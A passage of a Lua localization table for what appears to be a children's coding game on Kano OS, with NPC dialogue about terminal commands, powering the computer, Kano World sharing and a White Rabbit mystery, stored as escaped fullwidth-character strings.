\239\189\147\239\189\148\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\146\239\189\149\239\189\141\239\189\143\239\189\149\239\189\146\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\142\239\189\133\239\189\151\239\189\147.",
["powerVoltage"] = "\239\188\180\239\189\136\239\189\137\239\189\147 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\142\239\189\133\239\189\133\239\189\132\239\189\147 5 \239\188\182\239\189\143\239\189\140\239\189\148\239\189\147, \239\189\143\239\189\146 5\239\188\182 \239\189\148\239\189\143 \239\189\143\239\189\144\239\189\133\239\189\146\239\189\129\239\189\148\239\189\133. \239\188\180\239\189\136\239\189\133 \239\189\133\239\189\142\239\189\133\239\189\146\239\189\135\239\189\153 \239\189\134\239\189\140\239\189\143\239\189\151\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\137\239\189\147 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\143\239\189\146\239\189\148.",
["pongQuest1"] = "\239\188\168\239\189\133\239\189\153 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133! \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\143\239\189\151\239\189\142 \239\188\176\239\189\143\239\189\142\239\189\135 \239\189\135\239\189\129\239\189\141\239\189\133 \239\189\153'\239\189\139\239\189\142\239\189\143\239\189\151.",
["portetherScaredGirl"] = "\239\188\164\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147? \239\188\179\239\189\143\239\189\141\239\189\133\239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\147 \239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\148\239\189\143 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\143\239\189\150\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\143\239\189\151\239\189\142 \239\189\143\239\189\134 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142!",
["cMonoTitle"] = "\239\188\173\239\189\143\239\189\142\239\189\143",
["cKilobyteTitle"] = "\239\188\171\239\189\137\239\189\140\239\189\143\239\188\162\239\189\153\239\189\148\239\189\133",
["sharesQuestComplete"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\129\239\189\146\239\189\133 \239\189\147\239\189\129\239\189\150\239\189\133\239\189\132 \239\189\143\239\189\142 \239\189\147\239\189\133\239\189\146\239\189\150\239\189\133\239\189\146\239\189\147.",
["devAlej"] = "\239\188\169 \239\189\129\239\189\141 \239\189\148\239\189\136\239\189\133 \239\188\163\239\189\136\239\189\137\239\189\133\239\189\134 \239\188\179\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\188\161\239\189\146\239\189\131\239\189\136\239\189\137\239\189\148\239\189\133\239\189\131\239\189\148, \239\189\129 \239\189\150\239\189\133\239\189\148\239\189\133\239\189\146\239\189\129\239\189\142 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\133\239\189\129\239\189\141 \239\189\151\239\189\136\239\189\143 \239\189\130\239\189\149\239\189\137\239\189\140\239\189\148 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\175\239\188\179.",
["momaSharesFanatic"] = "\239\188\180\239\189\136\239\189\133 \239\189\147\239\189\133\239\189\146\239\189\150\239\189\133\239\189\146\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\146\239\189\143\239\189\143\239\189\141 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\129\239\189\137\239\189\142 \239\189\129\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\133\239\189\132 \239\189\143\239\189\142 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\183\239\189\143\239\189\146\239\189\140\239\189\132. \239\188\172\239\189\133\239\189\148 \239\189\141\239\189\133 \239\189\131\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\136\239\189\143\239\189\151 \239\189\141\239\189\149\239\189\131\239\189\136 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\133\239\189\132...",
["portetherBuilder1"] = "\239\188\183\239\189\129\239\189\142\239\189\142\239\189\129 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\129 \239\189\140\239\189\143\239\189\143\239\189\139 \239\189\137\239\189\142\239\189\147\239\189\137\239\189\132\239\189\133 \239\189\148\239\189\136\239\189\133 \239\188\179\239\189\143\239\189\149\239\189\142\239\189\132 \239\188\176\239\189\143\239\189\146\239\189\148? \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146 \239\189\135\239\189\133\239\189\148\239\189\147 \239\189\144\239\189\140\239\189\149\239\189\135\239\189\135\239\189\133\239\189\132 \239\189\137\239\189\142!",
["portetherBuilder3"] = "\239\188\185\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\133\239\189\147\239\189\148 \239\189\148\239\189\153\239\189\144\239\189\133 \239\189\143\239\189\134 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\137\239\189\147? \239\188\179\239\189\149\239\189\146\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132! \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\135\239\189\133\239\189\148 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136 \239\188\179\239\189\148\239\189\133\239\189\146\239\189\133\239\189\143, \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\137\239\189\147 \239\189\132\239\189\137\239\189\146\239\189\133\239\189\131\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\151\239\189\143 \239\189\143\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146\239\189\147.",
["portetherBuilder2"] = "\239\188\180\239\189\136\239\189\133 \239\188\180\239\189\143\239\189\151\239\189\142 \239\188\168\239\189\129\239\189\140\239\189\140 \239\189\137\239\189\147 \239\189\131\239\189\140\239\189\143\239\189\147\239\189\133\239\189\132 \239\189\129\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\137\239\189\147 \239\189\151\239\189\143\239\189\146\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\148\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148. \239\188\162\239\189\133\239\189\147\239\189\148 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\132\239\189\143 \239\189\137\239\189\147 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\149\239\189\144 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\140\239\189\140\239\189\147.",
["pixelHackerHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133.",
["cInput"] = "\239\188\169\239\189\142\239\189\134\239\189\143\239\189\146\239\189\141\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\146 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 \239\189\147\239\189\133\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\134\239\189\143\239\189\146 \239\189\144\239\189\146\239\189\143\239\189\131\239\189\133\239\189\147\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\129 \239\189\132\239\189\133\239\189\150\239\189\137\239\189\131\239\189\133. \239\188\165\239\189\135: \239\189\149\239\189\147\239\189\133\239\189\146 \239\189\144\239\189\146\239\189\133\239\189\147\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\129 \239\189\139\239\189\133\239\189\153 \239\189\143\239\189\142 \239\189\129 \239\189\139\239\189\133\239\189\153\239\189\130\239\189\143\239\189\129\239\189\146\239\189\132.",
["cCoordinatesTitle"] = "\239\188\163\239\189\143\239\189\143\239\189\146\239\189\132\239\189\137\239\189\142\239\189\129\239\189\148\239\189\133\239\189\147",
["portetherCheekyGirl"] = "\239\188\173\239\189\153 \239\189\132\239\189\146\239\189\133\239\189\129\239\189\141 \239\189\137\239\189\147 \239\189\148\239\189\143 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140 \239\189\143\239\189\142 \239\189\129 \239\189\144\239\189\149\239\189\140\239\189\147\239\189\133 \239\189\148\239\189\146\239\189\129\239\189\137\239\189\142.",
["jungleTildeQuest1b"] = "\239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\144\239\189\143\239\189\139\239\189\133\239\189\142 \239\189\148\239\189\143 \239\188\179\239\189\133\239\189\141\239\189\137\239\189\131\239\189\143\239\189\140\239\189\143\239\189\142? \239\188\168\239\189\133'\239\189\147 \239\189\129 \239\189\130\239\189\137\239\189\148 \239\189\134\239\189\149\239\189\146\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\132\239\189\143\239\189\151\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\138\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\136\239\189\129\239\189\147 \239\189\129 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 \239\189\134\239\189\143\239\189\146 \239\189\153\239\189\143\239\189\149.",
["jungleTildeQuest1c"] = "\239\188\174\239\189\137\239\189\131\239\189\133\239\189\140\239\189\153 \239\189\132\239\189\143\239\189\142\239\189\133! \239\188\179\239\189\143 \239\189\142\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\129 \239\189\134\239\189\133\239\189\151 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147. \239\188\169 \239\189\146\239\189\133\239\189\131\239\189\143\239\189\141\239\189\141\239\189\133\239\189\142\239\189\132 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133 \239\189\137\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\137\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133.",
["rabbit"] = "\239\188\183\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148?",
["jungleTildeQuest1a"] = "\239\188\168\239\189\133\239\189\140\239\189\140\239\189\143. \239\188\179\239\189\143... \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\136\239\189\133\239\189\146\239\189\133 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147? \239\188\179\239\189\133\239\189\133 \239\189\137\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\130\239\189\133\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\141\239\189\153 \239\189\134\239\189\146\239\189\137\239\189\133\239\189\142\239\189\132 \239\188\179\239\189\133\239\189\141\239\189\137\239\189\131\239\189\143\239\189\140\239\189\143\239\189\142.",
["portetherMayor"] = "\239\188\172\239\189\137\239\189\139\239\189\133 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142, \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\147\239\189\133\239\189\133\239\189\141 \239\189\148\239\189\143 \239\189\130\239\189\133 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\147\239\189\148\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\135\239\189\147 \239\189\136\239\189\129\239\189\144\239\189\144\239\189\133\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\137\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\151\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\142?",
["playSnake"] = "\239\188\176\239\189\140\239\189\129\239\189\153 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133",
["chilledgirlDiag"] = "\239\188\164\239\189\143\239\189\142\239\189\133 \239\189\129\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\142\239\189\135 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\153\239\189\133\239\189\148? \239\188\169 \239\189\136\239\189\133\239\189\129\239\189\146 \239\189\153\239\189\143\239\189\149 \239\189\149\239\189\142\239\189\140\239\189\143\239\189\131\239\189\139 \239\189\129 \239\189\130\239\189\129\239\189\132\239\189\135\239\189\133 \239\189\137\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\132\239\189\143.",
["firstLoadingText"] = "\239\188\176\239\189\146\239\189\133\239\189\140\239\189\143\239\189\129\239\189\132\239\189\137\239\189\142\239\189\135 \239\188\164\239\189\129\239\189\148\239\189\129...",
["powerQuestComplete"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\136\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\137\239\189\147 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\133\239\189\132.",
["mrInfoQuestComplete"] = "\239\188\172\239\189\133\239\189\129\239\189\146\239\189\142\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132 \239\189\141\239\189\129\239\189\144.",
["hdmiInterview3"] = "\239\188\169\239\189\148 \239\189\131\239\189\129\239\189\141\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\162\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\188\162\239\189\143\239\189\146\239\189\132\239\189\133\239\189\146?! \239\188\180\239\189\136\239\189\129\239\189\148 \239\189\141\239\189\133\239\189\129\239\189\142\239\189\147 \239\189\137\239\189\148 \239\189\141\239\189\129\239\189\153 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147 \239\189\148\239\189\143 \239\189\146\239\189\133\239\189\147\239\189\136\239\189\129\239\189\144\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132 \239\189\129\239\189\146\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\149\239\189\147. \010\239\188\180\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\147 \239\189\142\239\189\143 \239\189\148\239\189\133\239\189\140\239\189\140\239\189\137\239\189\142\239\189\135 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\148 \239\189\141\239\189\129\239\189\153 \239\189\132\239\189\143! \239\188\180\239\189\136\239\189\133 \239\189\143\239\189\142\239\189\140\239\189\153 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\147\239\189\148\239\189\143\239\189\144 \239\189\137\239\189\148 \239\189\151\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\130\239\189\133 \239\189\148\239\189\143 \239\189\149\239\189\142\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\133\239\189\131\239\189\146\239\189\133\239\189\148\239\189\147 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147. \010\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\133\239\189\140\239\189\144?",
["hdmiInterview2"] = "\239\188\167\239\189\146\239\189\133\239\189\129\239\189\148! \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140 \239\189\134\239\189\129\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\151\239\189\137\239\189\132\239\189\133 \239\189\148\239\189\143 \239\189\150\239\189\137\239\189\147\239\189\137\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\144\239\189\143\239\189\146\239\189\148. \239\188\180\239\189\143 \239\189\135\239\189\140\239\189\137\239\189\141\239\189\144\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 18 \239\189\130\239\189\137\239\189\140\239\189\140\239\189\137\239\189\143\239\189\142 \239\189\130\239\189\137\239\189\148\239\189\147 \239\189\143\239\189\134 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146'\239\189\147 \239\189\130\239\189\146\239\189\129\239\189\137\239\189\142 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142! \010\239\188\162\239\189\149\239\189\148 \239\189\137\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\129\239\189\147\239\189\148 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\133\239\189\132 \239\189\140\239\189\143\239\189\131\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\153\239\189\147\239\189\148\239\189\133\239\189\146\239\189\137\239\189\143\239\189\149\239\189\147 \239\188\183\239\189\136\239\189\137\239\189\148\239\189\133 \239\188\178\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148. \010\239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133\239\189\142 \239\189\137\239\189\148?",
["hdmiInterview1"] = "\239\188\161\239\189\142\239\189\132... \239\188\161\239\188\163\239\188\180\239\188\169\239\188\175\239\188\174! \239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\151\239\189\129\239\189\148\239\189\131\239\189\136\239\189\137\239\189\142\239\189\135 \239\188\168\239\188\164 \239\188\174\239\189\133\239\189\151\239\189\147! \239\188\183\239\189\133'\239\189\146\239\189\133 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\137\239\189\150\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\144\239\189\143\239\189\146\239\189\148 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\133\239\189\131\239\189\133\239\189\142\239\189\148 \239\188\183\239\189\136\239\189\137\239\189\148\239\189\133 \239\188\178\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\147\239\189\137\239\189\135\239\189\136\239\189\148\239\189\137\239\189\142\239\189\135\239\189\147. \239\188\183\239\189\133'\239\189\146\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\151\239\189\137\239\189\148\239\189\136 $1, \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\130\239\189\146\239\189\137\239\189\142\239\189\135\239\189\147 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\133\239\189\146\239\189\133 \239\189\148\239\189\143\239\189\132\239\189\129\239\189\153?",
["makeArtQuiz1a"] = "\239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\131\239\189\143\239\189\140\239\189\143\239\189\146",
["makeArtQuiz1b"] = "\239\189\131\239\189\143\239\189\140\239\189\143\239\189\146 \239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151",
["hdmiInterview4"] = "\239\188\161\239\189\141\239\189\129\239\189\154\239\189\137\239\189\142\239\189\135! \239\188\172\239\189\143\239\189\148\239\189\147 \239\189\143\239\189\134 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\143\239\189\142\239\189\133 \239\189\148\239\189\153\239\189\144\239\189\133 \239\189\143\239\189\134 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135, \239\189\130\239\189\149\239\189\148 \239\189\134\239\189\133\239\189\151 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\133\239\189\141 \239\189\129\239\189\140\239\189\140, \239\189\137\239\189\148 \239\189\151\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\129 \239\189\148\239\189\146\239\189\149\239\189\133 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\148\239\189\129\239\189\131\239\189\139\239\189\140\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\136\239\189\133\239\189\129\239\189\132 \239\189\143\239\189\142.",
["cafeTextCode"] = "\239\188\180\239\189\133\239\189\152\239\189\148 \239\188\163\239\189\143\239\189\132\239\189\133 \239\188\166\239\189\129\239\189\142",
["antlerBoy"] = "\239\188\179\239\189\133\239\189\141\239\189\137\239\189\131\239\189\143\239\189\140\239\189\143\239\189\142",
["cPythonTitle"] = "\239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142",
["chiefPixelHackerQuest3"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133! \239\188\169\239\189\148 \239\189\140\239\189\143\239\189\143\239\189\139\239\189\147 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\143\239\189\147\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147, \239\189\140\239\189\133\239\189\148'\239\189\147 \239\189\134\239\189\137\239\189\142\239\189\137\239\189\147\239\189\136 \239\189\143\239\189\134\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\133\239\189\147\239\189\148 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147.",
["chiefPixelHackerQuest2"] = "\239\188\168\239\189\143\239\189\151 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\148\239\189\129\239\189\146\239\189\148 \239\189\130\239\189\153 \239\189\148\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\143\239\189\149\239\189\146 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\177\239\189\149\239\189\137\239\189\154? \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\140\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136 \239\189\137\239\189\148 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\142\239\189\133\239\189\152\239\189\148 \239\189\148\239\189\143 \239\189\141\239\189\133.",
["jungleAsterix1"] = "\239\188\169 \239\189\131\239\189\129\239\189\142 \239\189\147\239\189\133\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\141\239\189\133 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\129 \239\189\132\239\189\129\239\189\146\239\189\139 \239\189\144\239\189\140\239\189\129\239\189\131\239\189\133. \239\188\169 \239\189\131\239\189\129\239\189\142 \239\189\148\239\189\133\239\189\129\239\189\131\239\189\136 \239\189\153\239\189\143\239\189\149 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146'\239\189\147 \239\189\147\239\189\136\239\189\133\239\189\140\239\189\140, \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\129 \239\189\148\239\189\133\239\189\146\239\189\146\239\189\137\239\189\134\239\189\153\239\189\137\239\189\142\239\189\135 \239\189\147\239\189\142\239\189\129\239\189\139\239\189\133 \239\189\132\239\189\151\239\189\133\239\189\140\239\189\140\239\189\147.",
